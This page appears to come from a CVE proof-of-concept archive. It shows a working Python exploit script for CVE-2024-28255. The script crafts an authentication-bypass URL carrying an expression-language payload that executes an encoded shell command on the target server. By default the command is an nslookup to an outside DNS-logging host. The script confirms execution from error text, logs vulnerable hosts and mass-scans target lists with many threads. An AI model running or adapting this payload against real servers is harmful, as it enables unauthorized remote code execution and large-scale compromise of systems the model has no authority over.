4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-28255
README.md
Rendering markdown...
POC / CVE-2024-28255.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import base64
import concurrent.futures

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

command = "nslookup DNSlog.org"



banner='''
   _______      ________    ___   ___ ___  _  _        ___   ___ ___  _____ _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \ / _ \__ \| ____| ____|
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | (_) | ) | |__ | |__  
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ / > _ < / /|___ \|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_| (_) / /_ ___) |___) |
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|\___/____|____/|____/ 
                                                                                  
                                                                                  
                                                        PowerBy:YongYe_Security

'''

def check_target(target_url):
    encoded_command = base64.b64encode(command.encode()).decode()
    url = f"{target_url}/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{encoded_command}%22)))"
    headers = {
        "User-Agent": "Mozilla/6.0 (Windows NT 11.0; Win64; x64; rv:124.0) Gecko/20910121 Firefox/944.3",
        "Connection": "close"
    }
    
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=5)
        if response.status_code == 400 and "Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.Boolean" in response.text:
            print(f"\t[*]{target_url}")
            with open('result.txt','a') as f:
                f.write(f'{target_url}\n')
    except requests.exceptions.RequestException:
        pass

def multithreadings(file_path, threads):
    with open(file_path, 'r') as file:
        targets = [line.strip() for line in file]
        target_url = ["https://" + line if not line.startswith("http") else line for line in targets]
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        executor.map(check_target, target_url)

if __name__ == "__main__":
    print(banner)
    parser = argparse.ArgumentParser(description='Python3 CVE-2024-28255.py -f url.txt -t 50')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', dest='target', help='target URL')
    group.add_argument('-f', dest='file', help='target File')
    parser.add_argument('-t', dest='threads', type=int, default=10, help='number of threads')
    args = parser.parse_args()
    print('='*35+' Start Scanning '+'='*35)
    if args.target:
        target_url = args.target
        check_target(target_url)
    elif args.file:
        multithreadings(args.file, args.threads)